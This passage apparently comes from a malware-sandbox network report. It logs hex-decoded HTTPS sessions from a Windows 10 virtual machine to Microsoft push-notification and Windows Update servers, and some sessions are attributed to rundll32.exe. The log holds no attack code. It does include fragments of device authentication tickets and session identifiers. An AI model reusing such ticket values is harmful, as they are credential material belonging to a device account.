                            2024-07-25 15:54:27 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 37 37 57 4a 58 5a 34 4a 46 6b 65 6f 54 32 6c 67 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 66 30 35 65 66 65 39 61 38 39 39 62 63 34 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 63 42 32 5a 68 6b 70 56 44 68 71 43 58 4d 2f 41 68 63 67 6b 4f 78 43 54 4a 6a 45 46 75 64 67 4a 35 66 46 38 48 65 63 52 6e 2b 57 54 32 54 34 37 7a 6d 63 77 51 62 62 43 6c 37 39 34 57 41 42 48 71 72 45 5a 67 74 46 71 35 53 6e 50 68 74 4b 41 4a 51 4d 46 2b 79 57 64 4a 6c 50 64 76 72 6c 6d 5a 69 68 72 34 72 4f 37 4b 4e 62 62
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 77WJXZ4JFkeoT2lg.2Context: 7f05efe9a899bc44<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZcB2ZhkpVDhqCXM/AhcgkOxCTJjEFudgJ5fF8HecRn+WT2T47zmcwQbbCl794WABHqrEZgtFq5SnPhtKAJQMF+yWdJlPdvrlmZihr4rO7KNbb
                            2024-07-25 15:54:27 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 37 37 57 4a 58 5a 34 4a 46 6b 65 6f 54 32 6c 67 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 66 30 35 65 66 65 39 61 38 39 39 62 63 34 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: 77WJXZ4JFkeoT2lg.3Context: 7f05efe9a899bc44<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.64971240.113.110.674432144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:54:27 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-25 15:54:27 UTC58INData Raw: 4d 53 2d 43 56 3a 20 66 62 6e 6b 73 37 48 50 49 55 4b 35 4a 31 4e 5a 42 53 6f 6e 78 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: fbnks7HPIUK5J1NZBSonxQ.0Payload parsing failed.


                            Session IDSource IPSource PortDestination IPDestination Port
                            4192.168.2.64971352.165.165.26443
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:54:31 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=O4c6ORKy9SdKx5O&MD=tSDbY3yp HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                            Host: slscr.update.microsoft.com


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.64971352.165.165.264432144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:54:31 UTC560INHTTP/1.1 200 OK
                            Cache-Control: no-cache
                            Pragma: no-cache
                            Content-Type: application/octet-stream
                            Expires: -1
                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                            MS-CorrelationId: f1bf5615-4080-4f85-a60f-87c6bd9ada5b
                            MS-RequestId: 91d766e7-41e7-4248-a1b9-86da4bd910ed
                            MS-CV: A5Pr0fdT/Euv0RCd.0
                            X-Microsoft-SLSClientCache: 2880
                            Content-Disposition: attachment; filename=environment.cab
                            X-Content-Type-Options: nosniff
                            Date: Thu, 25 Jul 2024 15:54:30 GMT
                            Connection: close
                            Content-Length: 24490
                            2024-07-25 15:54:31 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                            2024-07-25 15:54:31 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                            Session IDSource IPSource PortDestination IPDestination Port
                            6192.168.2.64971740.113.110.67443
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:54:40 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 68 35 30 71 6c 4a 51 66 6e 30 75 31 49 70 73 67 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 37 63 34 63 35 61 31 31 33 33 39 38 65 33 35 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: h50qlJQfn0u1Ipsg.1Context: 37c4c5a113398e35
                            2024-07-25 15:54:40 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-25 15:54:40 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 68 35 30 71 6c 4a 51 66 6e 30 75 31 49 70 73 67 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 37 63 34 63 35 61 31 31 33 33 39 38 65 33 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 63 42 32 5a 68 6b 70 56 44 68 71 43 58 4d 2f 41 68 63 67 6b 4f 78 43 54 4a 6a 45 46 75 64 67 4a 35 66 46 38 48 65 63 52 6e 2b 57 54 32 54 34 37 7a 6d 63 77 51 62 62 43 6c 37 39 34 57 41 42 48 71 72 45 5a 67 74 46 71 35 53 6e 50 68 74 4b 41 4a 51 4d 46 2b 79 57 64 4a 6c 50 64 76 72 6c 6d 5a 69 68 72 34 72 4f 37 4b 4e 62 62
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: h50qlJQfn0u1Ipsg.2Context: 37c4c5a113398e35<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZcB2ZhkpVDhqCXM/AhcgkOxCTJjEFudgJ5fF8HecRn+WT2T47zmcwQbbCl794WABHqrEZgtFq5SnPhtKAJQMF+yWdJlPdvrlmZihr4rO7KNbb
                            2024-07-25 15:54:40 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 68 35 30 71 6c 4a 51 66 6e 30 75 31 49 70 73 67 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 37 63 34 63 35 61 31 31 33 33 39 38 65 33 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: h50qlJQfn0u1Ipsg.3Context: 37c4c5a113398e35<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.64971740.113.110.674432144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:54:41 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-25 15:54:41 UTC58INData Raw: 4d 53 2d 43 56 3a 20 63 2b 54 6f 6f 6e 58 52 33 30 61 61 59 5a 44 58 68 6a 58 51 62 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: c+ToonXR30aaYZDXhjXQbw.0Payload parsing failed.


                            Session IDSource IPSource PortDestination IPDestination Port
                            8192.168.2.64971940.113.110.67443
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:55:03 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 47 2b 72 78 6c 2f 6b 52 41 45 4f 76 55 38 55 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 31 66 38 65 61 36 30 62 36 61 32 66 36 65 66 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: G+rxl/kRAEOvU8U3.1Context: 91f8ea60b6a2f6ef
                            2024-07-25 15:55:03 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-25 15:55:03 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 47 2b 72 78 6c 2f 6b 52 41 45 4f 76 55 38 55 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 31 66 38 65 61 36 30 62 36 61 32 66 36 65 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 63 42 32 5a 68 6b 70 56 44 68 71 43 58 4d 2f 41 68 63 67 6b 4f 78 43 54 4a 6a 45 46 75 64 67 4a 35 66 46 38 48 65 63 52 6e 2b 57 54 32 54 34 37 7a 6d 63 77 51 62 62 43 6c 37 39 34 57 41 42 48 71 72 45 5a 67 74 46 71 35 53 6e 50 68 74 4b 41 4a 51 4d 46 2b 79 57 64 4a 6c 50 64 76 72 6c 6d 5a 69 68 72 34 72 4f 37 4b 4e 62 62
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: G+rxl/kRAEOvU8U3.2Context: 91f8ea60b6a2f6ef<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZcB2ZhkpVDhqCXM/AhcgkOxCTJjEFudgJ5fF8HecRn+WT2T47zmcwQbbCl794WABHqrEZgtFq5SnPhtKAJQMF+yWdJlPdvrlmZihr4rO7KNbb
                            2024-07-25 15:55:03 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 47 2b 72 78 6c 2f 6b 52 41 45 4f 76 55 38 55 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 31 66 38 65 61 36 30 62 36 61 32 66 36 65 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: G+rxl/kRAEOvU8U3.3Context: 91f8ea60b6a2f6ef<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.64971940.113.110.674432144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:55:03 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-25 15:55:03 UTC58INData Raw: 4d 53 2d 43 56 3a 20 79 44 30 31 4b 50 33 4d 7a 6b 2b 70 77 6f 58 36 7a 38 6d 42 54 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: yD01KP3Mzk+pwoX6z8mBTw.0Payload parsing failed.


                            Session IDSource IPSource PortDestination IPDestination Port
                            10192.168.2.64972052.165.165.26443
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:55:09 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=O4c6ORKy9SdKx5O&MD=tSDbY3yp HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                            Host: slscr.update.microsoft.com


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.64972052.165.165.264432144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:55:09 UTC560INHTTP/1.1 200 OK
                            Cache-Control: no-cache
                            Pragma: no-cache
                            Content-Type: application/octet-stream
                            Expires: -1
                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                            MS-CorrelationId: f54582ed-3407-4bac-a203-861d6feec177
                            MS-RequestId: b53cfa9d-0d23-4602-a330-a89525db24df
                            MS-CV: R90JAJLm70myzTv6.0
                            X-Microsoft-SLSClientCache: 1440
                            Content-Disposition: attachment; filename=environment.cab
                            X-Content-Type-Options: nosniff
                            Date: Thu, 25 Jul 2024 15:55:08 GMT
                            Connection: close
                            Content-Length: 30005
                            2024-07-25 15:55:09 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                            2024-07-25 15:55:09 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                            Session IDSource IPSource PortDestination IPDestination Port
                            12192.168.2.64972240.113.110.67443
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:55:26 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 2b 74 48 59 77 45 31 71 39 6b 57 78 4f 46 74 53 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 34 62 61 37 64 64 31 63 30 64 63 66 66 30 62 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: +tHYwE1q9kWxOFtS.1Context: a4ba7dd1c0dcff0b
                            2024-07-25 15:55:26 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-25 15:55:26 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 2b 74 48 59 77 45 31 71 39 6b 57 78 4f 46 74 53 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 34 62 61 37 64 64 31 63 30 64 63 66 66 30 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 63 42 32 5a 68 6b 70 56 44 68 71 43 58 4d 2f 41 68 63 67 6b 4f 78 43 54 4a 6a 45 46 75 64 67 4a 35 66 46 38 48 65 63 52 6e 2b 57 54 32 54 34 37 7a 6d 63 77 51 62 62 43 6c 37 39 34 57 41 42 48 71 72 45 5a 67 74 46 71 35 53 6e 50 68 74 4b 41 4a 51 4d 46 2b 79 57 64 4a 6c 50 64 76 72 6c 6d 5a 69 68 72 34 72 4f 37 4b 4e 62 62
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: +tHYwE1q9kWxOFtS.2Context: a4ba7dd1c0dcff0b<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZcB2ZhkpVDhqCXM/AhcgkOxCTJjEFudgJ5fF8HecRn+WT2T47zmcwQbbCl794WABHqrEZgtFq5SnPhtKAJQMF+yWdJlPdvrlmZihr4rO7KNbb
                            2024-07-25 15:55:26 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 2b 74 48 59 77 45 31 71 39 6b 57 78 4f 46 74 53 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 34 62 61 37 64 64 31 63 30 64 63 66 66 30 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: +tHYwE1q9kWxOFtS.3Context: a4ba7dd1c0dcff0b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.64972240.113.110.674432144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:55:26 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
